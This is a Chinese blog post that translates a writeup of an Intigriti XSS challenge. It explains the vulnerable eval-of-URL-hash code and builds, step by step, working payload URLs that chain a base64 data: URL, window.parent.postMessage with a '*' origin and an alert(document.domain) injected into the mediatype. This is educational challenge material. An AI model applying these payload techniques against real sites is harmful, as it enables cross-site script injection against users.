<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="microworld,bubbl3@foxmail.com"><title>Intigriti XSS Challenge - Solution and problem solving approach · null</title><meta name="description" content="Intigriti XSS Challenge - Solution and problem solving approach原文链接：https://dee-see.github.io/intigriti/xss/2019/05/02/intigriti-xss-challenge-writeup"><meta name="keywords" content="security,pentest,personal"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/"></a></h3><div class="description"><p>及时行乐.</p></div></div></div><ul class="social-links"><li><a href="https://twitter.com/www.baidu.com"><i class="fa fa-twitter"></i></a></li><li><a href="http://weibo.com/www.baidu.com"><i class="fa fa-weibo"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/links">友链</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/favicon.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Intigriti XSS Challenge - Solution and problem solving approach</a></h3></div><div class="post-content"><h1 id="Intigriti-XSS-Challenge-Solution-and-problem-solving-approach"><a href="#Intigriti-XSS-Challenge-Solution-and-problem-solving-approach" class="headerlink" title="Intigriti XSS Challenge - Solution and problem solving approach"></a>Intigriti XSS Challenge - Solution and problem solving approach</h1><p><strong>原文链接：</strong><a href="https://dee-see.github.io/intigriti/xss/2019/05/02/intigriti-xss-challenge-writeup.html" target="_blank" rel="noopener">https://dee-see.github.io/intigriti/xss/2019/05/02/intigriti-xss-challenge-writeup.html</a></p>
<p>这是基于chrome的漏洞，但是google确实🐮🍺，反应速度极快，我准备复现的时候已经修复了，不过我在ipad上的Google浏览器实验时成功了</p>
<p>Intigriti发布了一个有趣的小XSS挑战，它要求创建一个特殊的URL，既可以用来分配iframe的SRC，也可以发送到一个eval调用来弹出一个警报（document.domain），这是挑战的目标。但是我们如何实现？让我们回到开始，一步步分析。</p>
<p>注意：最终漏洞仅适用于Chrome，因此如果您想要跟进，我建议您使用chrome。</p>
<p>主要代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">  const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|&lt;|&gt;/gi, &quot;forbidden&quot;);#document.location.hash打印出‘#’后的内容</span><br><span class="line">  const iframe = document.createElement(&quot;iframe&quot;); iframe.src = url; document.body.appendChild(iframe);</span><br><span class="line">  iframe.onload = function()&#123; window.addEventListener(&quot;message&quot;, executeCtx, false);&#125;</span><br><span class="line">  function executeCtx(e) &#123;</span><br><span class="line">    if(e.source == iframe.contentWindow)&#123;</span><br><span class="line">      e.data.location = window.location;</span><br><span class="line">      Object.assign(window, e.data);</span><br><span class="line">      eval(url);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  &lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><ol>
<li>代码获取hash当前页面的url（＃后面的任何内容），从中解码URL实体，然后用字符串“forbidden”替换“script”，“&lt;”或“&gt;”的任何实例。结果分配给url变量</li>
<li>iframe是在当前页面创建，其src是url刚刚创建，有效地加载一个URL到iframe</li>
<li>当iframe完成加载时，我们开始监听message事件并executeCtx在提出时甚至调用</li>
<li>该executeCtx功能已定义</li>
</ol>
<ul>
<li><p>该功能确保事件来自 iframe</p>
</li>
<li><p>本次活动的有效载荷的location属性写入当前windows的location，大概是为了再次保护重定向另一个URL</p>
</li>
<li><p>有效载荷对象中的每个属性都分配给window带有Object.assign(window, e.data)行（这意味着我发送的任何内容executeCtx都将在window…中定义…非常有趣）</p>
</li>
<li><p>url变量被eval</p>
</li>
</ul>
<p>阅读完该代码后，我的第一个问题是：<code>message</code>事件是什么？事实证明，有一个用于跨源通信的API <code>window.postMessage</code>，它允许您将对象发送给收听该<code>message</code>事件的任何人。</p>
<h2 id="一步一步的利用"><a href="#一步一步的利用" class="headerlink" title="一步一步的利用"></a>一步一步的利用</h2><p>绕过过滤，尝试利用base64<br><a href="https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD5hbGVydCgnaGknKTs8L3NjcmlwdD4=，这是base64" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD5hbGVydCgnaGknKTs8L3NjcmlwdD4=，这是base64</a> for <code>&lt;script&gt;alert(&#39;hi&#39;);&lt;/script&gt;</code>，我得到了我的<code>alert！</code>但是<code>alert(document.domain)</code>从内部不起作用，iframe因为它是一个数据URL，并且没有域。我们有一个alert盒子，但我想从外面弹出它，所以我远远没有结束。</p>
<p>Posting a message to the parent window</p>
<p>我们的目标是执行<code>eval（url）</code>，我现在需要去post一个message从而执行<code>executeCtx</code>函数。所以我尝试刚了解到的这个api并使用以下脚本：<code>&lt;script&gt;window.postMessage(&quot;test&quot;, &quot;*&quot;)&lt;/script&gt;</code>，<code>postMessage</code>函数的第二个参数是目标源，我明白使用<code>&#39;*&#39;</code>是一个坏的尝试，因为它允许任何人可以截断我的message但是我并不在意毕竟这只是个挑战，所以结果就是构造了如下的url：</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucG9zdE1lc3NhZ2UoInRlc3QiLCAiKiIpPC9zY3JpcHQ+" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucG9zdE1lc3NhZ2UoInRlc3QiLCAiKiIpPC9zY3JpcHQ+</a></p>
</blockquote>
<p>啥都没有。我在<code>executeCtx</code>下了断点但似乎没有命中。让我们回到<a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage" target="_blank" rel="noopener">MDN</a>了解<code>postMessage</code>函数是如何调用的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">targetWindow.postMessage(message, targetOrigin, [transfer]);</span><br><span class="line"></span><br><span class="line">targetWindow</span><br><span class="line">A reference to the window that will receive the message. Methods for obtaining such a reference include:</span><br><span class="line">- window.open (to spawn a new window and then reference it),</span><br><span class="line">- window.opener (to reference the window that spawned this one),</span><br><span class="line">- HTMLIFrameElement.contentWindow (to reference an embedded &lt;iframefrom its parent window),</span><br><span class="line">- window.parent (to reference the parent </span><br><span class="line">window from within an embedded &lt;iframe&gt;), or</span><br><span class="line">- window.frames + an index value (named or numeric).</span><br></pre></td></tr></table></figure></p>
<p>所以<code>postMessage</code>必须在window能够接收message的情况下被调用。于是调整我们的payload：<code>&lt;script&gt;window.parent.postMessage(&quot;test&quot;, &quot;*&quot;)&lt;/script&gt;</code>。我想要message能够被主视窗接收，所以<code>iframe</code>就是<code>windows.parent</code>，新的url如下：</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCJ0ZXN0IiwgIioiKTwvc2NyaXB0Pg" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCJ0ZXN0IiwgIioiKTwvc2NyaXB0Pg</a></p>
</blockquote>
<p>好的！现在我得到了一个来自<code>executeCtx</code>的js错误<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(index):31 Uncaught TypeError: Failed to set an indexed property on &apos;Window&apos;: Index property setter is not supported.</span><br><span class="line">    at Function.assign (&lt;anonymous&gt;)</span><br><span class="line">    at executeCtx ((index):31)</span><br></pre></td></tr></table></figure></p>
<p>这是因为数据是一个字符串所以我们遇到了<code>Object.assign(window, e.data);</code>问题。让我们先发送一个空对象。payload如下：<code>&lt;script&gt;window.parent.postMessage({}, &quot;*&quot;)&lt;/script&gt;</code>，转换为url如下：</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ+" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ+</a></p>
</blockquote>
<p>结果是<code>Uncaught SyntaxError: Unexpected end of input</code>由<code>eval(url)</code>这一行抛出。所以如下的值<code>data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ+</code>是无法去解析url变量中的有效js。</p>
<h2 id="将url转为js"><a href="#将url转为js" class="headerlink" title="将url转为js"></a>将url转为js</h2><p>现在我们的目标是让<code>eval(url)</code>解析有效的js（还没到思考xss的时候）。我知道有很多东西都能作为有效的js所以我跳出这个挑战尝试运行：<code>eval(&#39;data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ+&#39;)</code>在我的控制台。如期望一样发生了相同的错误。“Unexpected end of input” 意味着解析器期望另一个token但已经到达了字符串的末尾。我的url是以<code>+</code>结束，对于JS的表达式而言它没有什么实际意义，所以让我们将他剔除。这会让我们的base64字符串无效但我们之后会回到这个地方<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">eval(&apos;data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ&apos;)</span><br><span class="line">VM42:1 Uncaught ReferenceError: text is not defined</span><br><span class="line">    at eval (eval at &lt;anonymous&gt; ((index):1), &lt;anonymous&gt;:1:6)</span><br><span class="line">    at &lt;anonymous&gt;:1:1</span><br></pre></td></tr></table></figure></p>
<p>什么？<code>text</code> is not defined？起先我不知道<code>text</code>来自于哪儿，但我回看的时候。。。好吧。然后我令<code>text=1</code>再次执行<code>eval</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt; text = 1</span><br><span class="line">1</span><br><span class="line">&gt; eval(&apos;data:text/html;base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ&apos;)</span><br><span class="line">VM70:1 Uncaught ReferenceError: html is not defined</span><br><span class="line">    at eval (eval at &lt;anonymous&gt; ((index):1), &lt;anonymous&gt;:1:11)</span><br><span class="line">    at &lt;anonymous&gt;:1:1</span><br></pre></td></tr></table></figure></p>
<p>哦！<code>html</code>？对了！url未带<code>+</code>结束是一个有效的JS。还是不懂？下面是url缩进之后：</p>
<blockquote>
<p>data: // a label for a goto</p>
<p>text/html; // divides the variable text by the variable html</p>
<p>base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ // evalutes the base64 variable and the PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt9LCAiKiIpPC9zY3JpcHQ variable then returns the latter (see , operator)</p>
</blockquote>
<p>它肯定不是连贯的代码，但它是有效的JavaScript代码。字符串末尾的<code>+</code>只是一个简单的base64组件。我不断改进我的payload，只要遇到<code>+</code>则将他丢进垃圾桶直到以字母为结尾的base64编码能够是他成为有效的变量名</p>
<h2 id="最后考虑XSS"><a href="#最后考虑XSS" class="headerlink" title="最后考虑XSS"></a>最后考虑XSS</h2><p>所以如何让<code>eval</code>执行js呢，如何放入<code>alert(document.domain)</code>？我们回到<a href="https://developer.mozilla.org/" target="_blank" rel="noopener">MDN</a>了解data协议并寻找哪里能放入我的<code>alert</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">data:[&lt;mediatype&gt;][;base64],&lt;data&gt;</span><br><span class="line"></span><br><span class="line">The mediatype is a MIME type string, such as &apos;image/jpeg&apos; for a JPEG image file. If omitted, defaults to text/plain;charset=US-ASCII</span><br></pre></td></tr></table></figure></p>
<p><code>; charset = US-ASCII</code>引起了我的注意。也许我可以把我的有效载荷放在那里？它甚至看起来像一个JavaScript变量赋值！所以我在我的控制台中尝试这个<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&gt; text = 1</span><br><span class="line">1</span><br><span class="line">&gt; html = 1</span><br><span class="line">1</span><br><span class="line">&gt; eval(&apos;data:text/html;charset=alert(1);base64,whatever&apos;)</span><br><span class="line">Uncaught ReferenceError: base64 is not defined</span><br><span class="line">    at eval (eval at &lt;anonymous&gt; ((index):1), &lt;anonymous&gt;:1:33)</span><br><span class="line">    at &lt;anonymous&gt;:1:1</span><br></pre></td></tr></table></figure></p>
<p>是的！<code>alert</code>成功pop了！虽然它抱怨base64没有被定义但是alert成功了那么又何必在意呢？是时候转向网站了！我更改我的payload为<code>&lt;script&gt;window.parent.postMessage({text:1, html:1, base64:1}, &quot;*&quot;)&lt;/script&gt;hi intigriti</code>记住<code>Object.assign(window, e.data)</code>这行将携带我post的message从而对<code>text</code>和<code>html</code>变量进行定义（我定义了base64但那不重要），末尾的<code>hi intigriti</code>可以逃离base64编码造成的末尾<code>+</code>存在。<br>于是url变为：</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;charset=alert(1);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;charset=alert(1);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp</a></p>
</blockquote>
<p>但是。。。并没有奏效<br>data URLs最棒的一点就是你可以将他们放在你的地址栏然后查看结果，这一data URL：</p>
<blockquote>
<p>data:text/html;charset=alert(1);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp</p>
</blockquote>
<p>回显的信息是“This site can’t be reached”，研究了一阵我发现<code>alert(1)</code>的括号搞砸了这一切</p>
<h2 id="最后一步"><a href="#最后一步" class="headerlink" title="最后一步"></a>最后一步</h2><p>我花了大量的时间努力寻求不需要括号去调用函数的可替代方式直到我发现或许我并不需要<code>charset=</code>，或许移除它就能绕过破坏我url的字符验证。现在尝试：</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;alert(1);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;alert(1);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp</a></p>
</blockquote>
<p><code>alert(1)</code>成功了！，最后稍微调整一下</p>
<blockquote>
<p><a href="https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp" target="_blank" rel="noopener">https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PHNjcmlwdD53aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKHt0ZXh0OjEsIGh0bWw6MSwgYmFzZTY0OjF9LCAiKiIpPC9zY3JpcHQ+aGkgaW50aWdyaXRp</a></p>
</blockquote>
<p><img src="https://dee-see.github.io/images/intigriti_xss_victory.png" alt=""></p>
<p><strong>注意</strong>：早上我升级了我的chrome，上述的方法100%不奏效了。我并没有额外的测试但我认为是因为<code>iframe</code>是在<code>message</code>事件监听被启用前调用的。所以添加一个<code>setTimeout</code>去延迟<code>postMessage</code>调用可能会修复这个问题，这一建议由<a href="https://twitter.com/ephreet1/status/1124220724770738176" target="_blank" rel="noopener">@ephreet</a>.提出</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>作为xss挑战，这有大量的代码审计。下面就是我的主要步骤：</p>
<ul>
<li>理解代码是如何运行的将有很大帮助</li>
<li>不要过多关注目标，而是要有计划的针对中间步骤</li>
<li>当你对要解决的挑战手足无措时不要紧张，解决好每一步，答案便会逐渐清晰</li>
</ul>
<p>谢谢<a href="https://twitter.com/intigriti/" target="_blank" rel="noopener">@intigriti</a>我玩得很开心！恭喜大家，祝你们好运！</p>
<h2 id="什么是data-url-schema"><a href="#什么是data-url-schema" class="headerlink" title="什么是data url schema"></a>什么是data url schema</h2><p>data URI scheme 允许我们使用内联（inline-code）的方式在网页中包含数据，目的是将一些小的数据，直接嵌入到网页中，从而不用再从外部文件载入。常用于将图片嵌入网页。</p>
<h3 id="Data-URI的格式规范"><a href="#Data-URI的格式规范" class="headerlink" title="Data URI的格式规范,"></a>Data URI的格式规范,</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">data:[&lt;mime type&gt;][;charset=&lt;charset&gt;][;&lt;encoding&gt;],&lt;encoded data&gt;</span><br><span class="line"></span><br><span class="line">1.  data ：协议名称；</span><br><span class="line"></span><br><span class="line">2.  [&lt;mime type&gt;] ：可选项，数据类型（image/png、text/plain等）</span><br><span class="line"></span><br><span class="line">3.  [;charset=&lt;charset&gt;] ：可选项，源文本的字符集编码方式</span><br><span class="line"></span><br><span class="line">4.  [;&lt;encoding&gt;] ：数据编码方式（默认US-ASCII，BASE64两种）</span><br><span class="line"></span><br><span class="line">5.  ,&lt;encoded data&gt; ：编码后的数据</span><br></pre></td></tr></table></figure>
<p>目前，Data URI scheme支持的类型有：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">data:,                            文本数据</span><br><span class="line">data:text/plain,                    文本数据</span><br><span class="line">data:text/html,                  HTML代码</span><br><span class="line">data:text/html;base64,            base64编码的HTML代码</span><br><span class="line">data:text/css,                    CSS代码</span><br><span class="line">data:text/css;base64,              base64编码的CSS代码</span><br><span class="line">data:text/javascript,              Javascript代码</span><br><span class="line">data:text/javascript;base64,        base64编码的Javascript代码</span><br><span class="line">data:image/gif;base64,            base64编码的gif图片数据</span><br><span class="line">data:image/png;base64,            base64编码的png图片数据</span><br><span class="line">data:image/jpeg;base64,          base64编码的jpeg图片数据</span><br><span class="line">data:image/x-icon;base64,          base64编码的icon图片数据</span><br></pre></td></tr></table></figure></p>
<p>参考链接：<a href="https://www.jianshu.com/p/ea49397fcd13" target="_blank" rel="noopener">https://www.jianshu.com/p/ea49397fcd13</a></p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2019-05-09</span><i class="fa fa-tag"></i><a class="tag" href="/tags/xss/" title="xss">xss </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" href="http://twitter.com/home?status=,http://microvorld.com/2019/05/09/vulnerable/intigriti xss challenge/,null,Intigriti XSS Challenge - Solution and problem solving approach,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2019/05/12/cve/CVE-2018-8715/" title="CVE-2018-8715">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2019/05/07/靶机/FristiLeak/" title="vulnhub--FristiLeaks v1.3">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>